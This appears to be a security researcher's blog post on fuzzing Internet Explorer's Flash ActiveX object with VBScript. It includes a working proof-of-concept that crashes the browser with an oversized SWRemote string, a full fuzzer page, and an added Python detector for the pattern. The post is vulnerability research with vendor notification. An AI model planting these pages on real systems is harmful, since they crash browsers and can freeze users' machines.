VBScript Fuzzing.

Published on: 1207855210
I wrote a small VBScript fuzzer for Internet Explorer, mainly to fuzz objects. The reason is that regular JavaScript is somewhat protected against overflowing the heap in loops: Internet Explorer notices a huge loop and either kills it or asks you to kill it. I noticed that this isn't the case with VBScript; it lets the code run until it runs out of memory or overflows the heap, and only gives a warning or crashes after the overflow has happened. That is neat, because it is more reliable.



Fuzzing the Flash object.



I found out that it's possible to overflow the Flash object through its SWRemote property with a very long string generated in VBScript. In my test case it runs for about 30 seconds before crashing and raising the exception, probably a heap corruption. Trying to kill it can result in a full system freeze; in two cases I had to reboot the system because it had used up all available memory.



The vulnerable object parameter:

<param name="swRemote" value="">

which can be set from script in IE with SWRemote=long_string:

<object classid='clsid:D27CDB6E-AE6D-11CF-96B8-444553540000' id='foo'>
<param name="src" value="foo.swf">
</object>

<object classid='clsid:D27CDB6E-AE6D-11CF-96B8-444553540000' id='bar'>
<param name="src" value="foo.swf">
</object>

<script type='text/vbscript'>
' Build a 100,000,000 character string; the variable is called longStr
' because Long is a reserved word in VBScript.
longStr = String(100000000, "X")
' Assign it to the SWRemote property of both Flash instances.
foo.SWRemote = longStr
bar.SWRemote = longStr
</script>




Figure 1 shows a live trace captured while Internet Explorer was executing the code; it shows the exception being raised because of excessive memory allocation.



Figure 1.







The VBScript Fuzzer.



A live demo can be found here: http://0x000000.com/lab/swf/swf.php

<html>
<body>

<h1>Flash Object VBFuzzer</h1>
<hr />

<object classid='clsid:D27CDB6E-AE6D-11CF-96B8-444553540000' id='foo'>
<param name="src" value="foo.swf">
<param name="playing" value="0">
</object>

<object classid='clsid:D27CDB6E-AE6D-11CF-96B8-444553540000' id='bar'>
<param name="src" value="foo.swf">
<param name="playing" value="0">
</object>

<hr />

<script type="text/vbscript">

' ------------------------------
' by Ronald van den Heetkamp
' SWRemote crashes MSIE7
' full system freeze on kill?
' ------------------------------
'
' Property names to fuzz (196 entries, indices 0 to 195); the fuzz loop
' below only uses indices 147 to 195.
Dim DataArray(195)

DataArray(0) = "nextSibling"

DataArray(1) = "onresizeend"

DataArray(2) = "onrowenter"

DataArray(3) = "ariaPosinset"

DataArray(4) = "childNodes"

DataArray(5) = "ondragleave"

DataArray(6) = "canHaveHTML"

DataArray(7) = "onbeforepaste"

DataArray(8) = "ondragover"

DataArray(9) = "ariaSelected"

DataArray(10) = "onbeforecopy"

DataArray(11) = "ariaHidden"

DataArray(12) = "onpage"

DataArray(13) = "recordNumber"

DataArray(14) = "previousSibling"

DataArray(15) = "nodeName"

DataArray(16) = "onbeforeactivate"

DataArray(17) = "accessKey"

DataArray(18) = "currentStyle"

DataArray(19) = "ariaChecked"

DataArray(20) = "scrollLeft"

DataArray(21) = "onbeforeeditfocus"

DataArray(22) = "oncontrolselect"

DataArray(23) = "onblur"

DataArray(24) = "hideFocus"

DataArray(25) = "clientHeight"

DataArray(26) = "style"

DataArray(27) = "onbeforedeactivate"

DataArray(28) = "dir"

DataArray(29) = "onkeydown"

DataArray(30) = "nodeType"

DataArray(31) = "ondragstart"

DataArray(32) = "onscroll"

DataArray(33) = "onpropertychange"

DataArray(34) = "ondragenter"

DataArray(35) = "id"

DataArray(36) = "onrowsinserted"

DataArray(37) = "scopeName"

DataArray(38) = "lang"

DataArray(39) = "ariaSetsize"

DataArray(40) = "onmouseup"

DataArray(41) = "oncontextmenu"

DataArray(42) = "language"

DataArray(43) = "ariaLevel"

DataArray(44) = "ariaReadonly"

DataArray(45) = "scrollTop"

DataArray(46) = "offsetWidth"

DataArray(47) = "onbeforeupdate"

DataArray(48) = "onreadystatechange"

DataArray(49) = "onmouseenter"

DataArray(50) = "filters"

DataArray(51) = "onresize"

DataArray(52) = "isContentEditable"

DataArray(53) = "oncopy"

DataArray(54) = "onselectstart"

DataArray(55) = "scrollHeight"

DataArray(56) = "onmove"

DataArray(57) = "ondragend"

DataArray(58) = "onrowexit"

DataArray(59) = "lastChild"

DataArray(60) = "onactivate"

DataArray(61) = "canHaveChildren"

DataArray(62) = "onfocus"

DataArray(63) = "onfocusin"

DataArray(64) = "isMultiLine"

DataArray(65) = "onmouseover"

DataArray(66) = "ariaHaspopup"

DataArray(67) = "ariaMultiselect"

DataArray(68) = "oncut"

DataArray(69) = "parentNode"

DataArray(70) = "ariaSecret"

DataArray(71) = "tagName"

DataArray(72) = "className"

DataArray(73) = "onmousemove"

DataArray(74) = "title"

DataArray(75) = "role"

DataArray(76) = "behaviorUrns"

DataArray(77) = "ariaInvalid"

DataArray(78) = "onfocusout"

DataArray(79) = "onfilterchange"

DataArray(80) = "disabled"

DataArray(81) = "parentTextEdit"

DataArray(82) = "ariaValuenow"

DataArray(83) = "ownerDocument"

DataArray(84) = "offsetParent"

DataArray(85) = "ondrop"

DataArray(86) = "ondblclick"

DataArray(87) = "tabIndex"

DataArray(88) = "onkeypress"

DataArray(89) = "onlosecapture"

DataArray(90) = "innerText"

DataArray(91) = "children"

DataArray(92) = "parentElement"

DataArray(93) = "ondeactivate"

DataArray(94) = "isDisabled"

DataArray(95) = "ondatasetchanged"

DataArray(96) = "ondataavailable"

DataArray(97) = "onafterupdate"

DataArray(98) = "nodeValue"

DataArray(99) = "onmousewheel"

DataArray(100) = "onkeyup"

DataArray(101) = "readyState"

DataArray(102) = "offsetTop"

DataArray(103) = "onmovestart"

DataArray(104) = "onmouseout"

DataArray(105) = "onrowsdelete"

DataArray(106) = "onmoveend"

DataArray(107) = "ariaExpanded"

DataArray(108) = "contentEditable"

DataArray(109) = "document"

DataArray(110) = "firstChild"

DataArray(111) = "sourceIndex"

DataArray(112) = "outerText"

DataArray(113) = "isTextEdit"

DataArray(114) = "oncellchange"

DataArray(115) = "runtimeStyle"

DataArray(116) = "scrollWidth"

DataArray(117) = "onlayoutcomplete"

DataArray(118) = "onhelp"

DataArray(119) = "attributes"

DataArray(120) = "offsetHeight"

DataArray(121) = "onerrorupdate"

DataArray(122) = "ariaBusy"

DataArray(123) = "onmousedown"

DataArray(124) = "clientTop"

DataArray(125) = "clientWidth"

DataArray(126) = "ariaRequired"

DataArray(127) = "onpaste"

DataArray(128) = "tagUrn"

DataArray(129) = "onmouseleave"

DataArray(130) = "ariaDisabled"

DataArray(131) = "ariaPressed"

DataArray(132) = "onclick"

DataArray(133) = "outerHTML"

DataArray(134) = "ondrag"

DataArray(135) = "onresizestart"

DataArray(136) = "ondatasetcomplete"

DataArray(137) = "clientLeft"

DataArray(138) = "all"

DataArray(139) = "onbeforecut"

DataArray(140) = "innerHTML"

DataArray(141) = "offsetLeft"

DataArray(142) = "vspace"

DataArray(143) = "height"

DataArray(144) = "border"

DataArray(145) = "altHtml"

DataArray(146) = "alt"

DataArray(147) = "codeBase"

DataArray(148) = "type"

DataArray(149) = "codeType"

DataArray(150) = "useMap"

DataArray(151) = "standby"

DataArray(152) = "width"

DataArray(153) = "dataSrc"

DataArray(154) = "dataFld"

DataArray(155) = "dataFormatAs"

DataArray(156) = "declare"

DataArray(157) = "name"

DataArray(158) = "form"

DataArray(159) = "archive"

DataArray(160) = "onerror"

DataArray(161) = "contentDocument"

DataArray(162) = "code"

DataArray(163) = "align"

DataArray(164) = "BaseHref"

DataArray(165) = "hspace"

DataArray(166) = "ReadyState"

DataArray(167) = "TotalFrames"

DataArray(168) = "Playing"

DataArray(169) = "Quality"

DataArray(170) = "ScaleMode"

DataArray(171) = "AlignMode"

DataArray(172) = "BackgroundColor"

DataArray(173) = "Loop"

DataArray(174) = "Movie"

DataArray(175) = "FrameNum"

DataArray(176) = "WMode"

DataArray(177) = "SAlign"

DataArray(178) = "Menu"

DataArray(179) = "Base"

DataArray(180) = "Scale"

DataArray(181) = "DeviceFont"

DataArray(182) = "EmbedMovie"

DataArray(183) = "BGColor"

DataArray(184) = "Quality2"

DataArray(185) = "SWRemote"

DataArray(186) = "FlashVars"

DataArray(187) = "AllowScriptAccess"

DataArray(188) = "MovieData"

DataArray(189) = "InlineData"

DataArray(190) = "SeamlessTabbing"

DataArray(191) = "Profile"

DataArray(192) = "ProfileAddress"

DataArray(193) = "ProfilePort"

DataArray(194) = "AllowNetworking"

DataArray(195) = "AllowFullScreen"





' String overloader
' -----------------
' Builds a 100,000,000 character string and assigns it to the property
' named by n (e.g. "foo.SWRemote"). n is a plain string, so assigning to
' n itself would never touch the object; Execute performs the assignment
' by name in this script's scope instead.

Sub overload(n)
    Dim s
    s = String(100000000, "1")
    Execute n & " = s"
End Sub

' Button handler: hit the same property on both Flash instances.
Sub fuzz(i)
    overload "foo." & DataArray(i)
    overload "bar." & DataArray(i)
End Sub

' The fuzz loop
' -------------
' One button per property. The handler receives the array index, so no
' property name has to be quoted inside the attribute, and the vbscript:
' prefix pins the handler language regardless of the page default.

For count = 147 To 195
    document.write("<br /><input type=""button"" value=""Fuzz!"" onclick=""vbscript:fuzz(" & count & ")"" /> " & DataArray(count))
Next

</script>

</body>
</html>
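A defender-side check for the pattern that both the proof of concept and the fuzzer above rely on (an added example, not the author's code): it scans a page for Flash <object> tags by CLSID, VBScript String() allocations above an assumed size threshold, and script writes to those objects' properties, and flags the page when both ingredients are present. The sample pages are constructed for the example.

```python
import re
from dataclasses import dataclass, field

# Flash Player ActiveX CLSID as used by the page's <object> tags.
FLASH_CLSID = "D27CDB6E-AE6D-11CF-96B8-444553540000"
# Assumed threshold: String(n, c) allocations of n characters or more are
# reported (the proof of concept above uses 100000000).
HUGE_STRING = 1_000_000

OBJECT_TAG = re.compile(r"<object\b([^>]*)>", re.I)
CLSID_ATTR = re.compile(r"classid\s*=\s*['\"]?clsid:([0-9a-f-]+)", re.I)
ID_ATTR = re.compile(r"\bid\s*=\s*['\"]?([\w-]+)", re.I)
VBS_BLOCK = re.compile(
    r"<script\b[^>]*(?:type\s*=\s*['\"]?text/vbscript|language\s*=\s*['\"]?vbscript)"
    r"[^>]*>(.*?)</script>", re.I | re.S)
STRING_CALL = re.compile(r"\bString\s*\(\s*(\d+)\s*,", re.I)

@dataclass
class Report:
    flash_ids: list = field(default_factory=list)          # ids of Flash <object>s
    huge_strings: list = field(default_factory=list)       # String() sizes found
    flash_prop_writes: list = field(default_factory=list)  # e.g. "foo.SWRemote"

    @property
    def suspicious(self) -> bool:
        # Both ingredients of the crash: a huge string and a property write.
        return bool(self.huge_strings and self.flash_prop_writes)

def scan_html(html: str) -> Report:
    """Flag VBScript that builds a huge string and writes Flash object properties."""
    r = Report()
    for attrs in OBJECT_TAG.findall(html):
        clsid, oid = CLSID_ATTR.search(attrs), ID_ATTR.search(attrs)
        if clsid and oid and clsid.group(1).upper() == FLASH_CLSID:
            r.flash_ids.append(oid.group(1))
    for body in VBS_BLOCK.findall(html):
        r.huge_strings += [int(n) for n in STRING_CALL.findall(body) if int(n) >= HUGE_STRING]
        for oid in r.flash_ids:
            writes = re.finditer(r"\b%s\.(\w+)\s*=" % re.escape(oid), body, re.I)
            r.flash_prop_writes += [f"{oid}.{m.group(1)}" for m in writes]
    return r

# Constructed samples: the proof-of-concept pattern and a harmless page.
POC_HTML = """<object classid='clsid:D27CDB6E-AE6D-11CF-96B8-444553540000' id='foo'>
<param name="src" value="foo.swf"></object>
<object classid='clsid:D27CDB6E-AE6D-11CF-96B8-444553540000' id='bar'>
<param name="src" value="foo.swf"></object>
<script type='text/vbscript'>
longStr = String(100000000, "X")
foo.SWRemote = longStr
bar.SWRemote = longStr
</script>"""
BENIGN_HTML = """<object classid='clsid:D27CDB6E-AE6D-11CF-96B8-444553540000' id='player'>
</object><script type="text/vbscript">sep = String(40, "-")
document.write(sep)</script>"""
```

Run `scan_html` over fetched pages or proxy captures; a `Report` with `suspicious` set is worth a closer look, while a lone large String() is only a weak signal on its own.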






Conclusion.



It seems that VBScript is a much more reliable way of controlling the heap than regular JavaScript, i.e. JScript. Microsoft was notified about the issue in a timely manner.